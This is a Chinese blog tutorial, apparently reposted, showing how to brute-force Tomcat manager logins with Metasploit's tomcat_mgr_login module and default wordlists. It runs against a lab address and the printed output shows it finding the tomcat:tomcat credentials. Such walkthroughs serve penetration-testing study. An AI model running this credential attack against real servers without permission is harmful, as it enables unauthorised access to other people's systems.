zoukankan      html  css  js  c++  java

  • 安全测试18渗透攻击Tomcat服务

    1、打开msfconsole控制台

    msfconsole

     2、搜索有效的Tomcat模块

    msf > search tomcat

     这里我们选择使用模块auxiliary/scanner/http/tomcat_mgr_login 

    3.使用Tomcat管理登录模块进行渗透攻击,执行命令如下:

    msf6 > use auxiliary/scanner/http/tomcat_mgr_login

     4,查看tomcat_mgr_login模块有效选项,执行命令

    msf auxiliary(scanner/http/tomcat_mgr_login) > show options

    5.指定用户名和密码文件,这里使用默认路径

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

    6.指定要攻击的目标服务器

    msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

    7.设置服务器端口号为8180

    msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) >

    8,运行渗透程序

    msf auxiliary(scanner/http/tomcat_mgr_login) > exploit 

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

     从结果中可以看到找到的账号密码为tomcat,tomcat

    更多技术请关注微信公众号:程序员技术前沿
  • 相关阅读:
    《梦幻西游》打响反盗号战役:为2亿玩家提供360安全武器 狼人:
    瑞星发表官方声明:记者王学武系恶意诽谤 狼人:
    中美联合挫败Conficker蠕虫大攻击 狼人:
    安全机构建议奥巴马政府谨慎使用开源软件 狼人:
    大量计算机遭“灰鸽子”病毒攻击 狼人:
    警惕IE7新漏洞导致的木马病毒暴增 狼人:
    IE7漏洞被瞄准 新型攻击将爆发 狼人:
    Windows 7成为Pwn2own黑客挑战赛目标 狼人:
    黑客入侵唱片业协会网站 为“海盗湾”助威 狼人:
    “猫癣”“犇牛”木马病毒肆虐 专家提醒补漏洞 狼人:
  • 原文地址:https://www.cnblogs.com/tiechui2015/p/15715073.html
Copyright © 2011-2022 走看看